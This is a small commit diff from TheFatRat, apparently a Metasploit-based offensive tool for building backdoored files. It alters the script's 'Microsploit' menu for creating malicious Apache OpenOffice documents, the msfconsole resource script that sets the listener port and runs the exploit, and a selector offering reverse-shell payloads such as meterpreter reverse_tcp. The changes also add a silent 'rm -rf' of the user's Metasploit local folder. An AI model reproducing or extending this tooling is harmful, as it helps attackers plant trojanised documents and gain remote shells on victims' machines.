fixes in variables

This commit is contained in:
root 2017-03-17 15:31:28 -04:00
parent b668335b5e
commit 4e2a20e024
3 changed files with 7 additions and 3 deletions

View File

@ -1,5 +1,6 @@
## CHANGELOG
* v1.9.2 - Fixes in Microsploit
* v1.9.2 - Implemented local ip , public ip & hostname display to powerfull.sh
* v1.9.2 - Implemented local ip , public ip & hostname display before user set Lhost
* v1.9.2 - Implemented log creation for microsploit & fixed bugs

7
fatrat
View File

@ -1076,6 +1076,9 @@ CODENAME='Mario Bros'
echo -e $white" |"$okegreen"4$white| "$cyan"Apache OpenOffice on Windows (PSH)"
echo -e $white" |"$okegreen"5$white| "$cyan"Apache OpenOffice on Linux/OSX (Python)"
echo -e $white" |"$okegreen"6$white| "$cyan"Exit\n"
# Seems to fix some metasploit bugs
rm -rf ~/.msf4/local/* >/dev/null 2>&1
echo -n -e $red' \033[4mMicrosploit@fatrat:\033[0m>> '; tput sgr0
read choice
case $choice in
@ -1439,7 +1442,7 @@ echo -e $okegreen ""
echo "set LPORT $yourport" >> $meterp
echo "set FILENAME $fira.odt" >> $meterp
echo "set BODY $bodys" >> $meterp
echo "exploit -z" >> $meterp
echo "exploit" >> $meterp
echo "exit -y" >> $meterp
msploitr
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp"
@ -1494,7 +1497,7 @@ fi
fi
echo ""
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
spinlong
echo ""
echo ""

View File

@ -1 +1 @@
Don't Delete the Folder temp and dont change directory name , if you change you must change the scripttoo
Don't Delete the Folder temp and dont change directory name , if you change you must change the scripttoo